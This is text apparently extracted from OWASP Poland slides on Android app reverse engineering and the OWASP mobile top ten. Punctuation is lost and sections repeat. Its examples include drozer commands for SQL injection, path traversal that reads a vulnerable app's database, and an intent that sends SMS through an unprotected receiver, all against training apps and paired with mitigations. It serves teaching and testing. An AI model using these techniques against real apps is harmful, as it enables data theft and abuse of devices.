Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
